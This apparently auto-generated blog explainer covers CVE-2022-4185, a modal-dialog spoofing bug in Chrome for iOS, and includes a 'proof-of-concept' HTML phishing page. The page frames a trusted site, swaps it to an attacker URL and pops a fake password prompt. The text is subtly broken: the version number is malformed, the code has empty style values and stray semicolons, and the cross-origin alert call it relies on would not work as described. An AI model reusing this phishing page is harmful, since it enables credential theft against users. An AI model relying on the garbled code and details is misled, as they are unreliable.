In December 2022, Google patched a medium-severity security issue affecting Chrome for iOS (Safari-based), tracked as CVE-2022-4185. This bug allowed remote attackers to spoof the contents of modal dialogue boxes — like JavaScript alert(), confirm(), and prompt()—using a carefully designed HTML page. In simple words: a malicious website could show a message that appears to come from another trusted website, tricking users and opening doors for phishing or scams.
Google patched this in Chrome iOS version 108..5359.71. Let's break down what happened, how abuse was possible, and illustrate a sample attack. This bug is not present in updated browsers, but understanding it helps us learn how these attacks work and why updates matter.
What happened? (The vulnerability explained)
On iOS, Chrome is built on top of Safari’s WebKit. There was a flaw in the way Navigation was handled in Chrome's code for modal dialogues. After a website changed the content in a frame (like via JavaScript), Chrome could be tricked into displaying modal dialogue boxes—pop-up alert or confirm messages—showing *wrong* website info.
Let’s say you're browsing example.com. A malicious page could open a pop-up or redirect, but spoof the modal so it *looks like* it came from google.com. That misleads users—phishing is much easier.
Data Theft: Ask for credentials, saying “Your session expired, please log in again.”
- Scareware/Scams: Fake alerts about viruses, asking for payment or downloads.
Proof-of-Concept: Exploiting CVE-2022-4185
Here’s a simplified proof-of-concept exploiting this flaw. It opens a modal (like alert() or prompt()) after navigation, so it appears to come from a different site.
<!--
Simple exploit for CVE-2022-4185
(Insecure Chrome for iOS - before 108..5359.71)
-->
<html>
<body>
<iframe id="victim" src="https://trusted-site.com"; style="width:;height:;border:;"></iframe>
<script>
// After iframe loads, replace its content and trigger alert
var frame = document.getElementById('victim');
frame.onload = function() {
// Navigate iframe to attacker site
frame.src = "https://malicious-site.com/phish";;
setTimeout(function() {
// Modal dialog is triggered from the attacker’s content, but Chrome could
// show dialog as if from "trusted-site.com"
frame.contentWindow.alert("Session expired. Please enter your password again.");
}, 100); // Wait to ensure navigation occurs
};
</script>
</body>
</html>
What happens?
On affected Chrome iOS browsers, this would show a modal dialogue to the user that appears to come from “trusted-site.com”, even though it’s attacker-controlled.
Real-World Example
A scammer could use a page like above that loads your email provider in a hidden frame. After a few seconds, your browser pops up a message seemingly from your mail, like:
*“Your session expired, please sign in again.”*
But the prompt is fake—it is controlled by the attacker’s code.
How did Google fix it?
Google’s engineers updated how modal dialogues are handled, ensuring Chrome always shows modal content from the actual, current site, not the previous one. Dialogues can no longer be spoofed by a quick navigation swap or frame tricks.
References and Further Reading
- Google Chrome Release Notes for iOS (Version 108..5359.71)
- Chromium CVE-2022-4185 Issue Report (Restricted)
- NVD - CVE-2022-4185 Entry
- How modern phishing attacks use browser UI
- Why browser updates matter
Update Chrome on iOS (and any browser, always).
- Don’t trust pop-ups that ask for passwords or payments, even if they *look* like they’re from a site you use.
Conclusion
CVE-2022-4185 is an example of a real-world bug that could have led to phishing on millions of iPhones and iPads. The fix shows how crucial regular updates are. Browser security is always improving, but attackers keep looking for clever tricks. Stay updated—and stay alert!
Timeline
Published on: 11/30/2022 00:15:00 UTC
Last modified on: 05/03/2023 12:16:00 UTC